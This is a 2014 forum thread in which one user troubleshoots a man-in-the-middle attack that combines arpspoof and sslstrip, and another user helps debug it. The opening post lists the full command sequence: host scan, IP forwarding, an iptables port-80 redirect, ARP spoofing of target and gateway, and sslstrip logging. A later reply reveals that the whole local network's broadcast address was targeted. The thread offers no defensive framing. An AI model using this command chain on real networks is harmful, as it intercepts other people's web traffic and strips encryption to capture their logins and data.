echemmon Posted October 4, 2014 Share Posted October 4, 2014 Hello OK so when I do sslstrip and try to make it work with arpsoof the victim's internet stops working. Like the pages won't load. Anybody else ever had that issue? I did exactly: nmap -sn <gatewayIP>/24echo 1 > /proc/sys/net/ipv4/ip_forwardiptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port <listenPort>arpspoof -i <interface> -t <targetIP> -r <gatewayIP>sslstrip -l <listenPort>tail -f sslstrip.log and btw I used 8080 for listenPort but I don't think that matters. Anywho, if somebody knows what's the problem - any advice would be very appreciated. Quote Link to comment Share on other sites More sharing options...
digininja Posted October 4, 2014 Share Posted October 4, 2014 Why obfuscate your commands? Without seeing what you are actually doing and the network structure then it is hard to say what you've done wrong. Drop the iptables and sslstrip, does everything work? That will give you a clue where the problem is. Quote Link to comment Share on other sites More sharing options...
echemmon Posted October 6, 2014 Author Share Posted October 6, 2014 All the IPs I typed in were fine (192.168.1.1 for gateway, the bcast ip 192.168.1.255 for targetting the network and 10000 for listen port). But nevermind it works again. Still weird, though - I'd honestly like to know what caused that. Quote Link to comment Share on other sites More sharing options...
digininja Posted October 7, 2014 Share Posted October 7, 2014 and btw I used 8080 for listenPort but I don't think that matters. and 10000 for listen port Sounds like that could be the problem to me. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.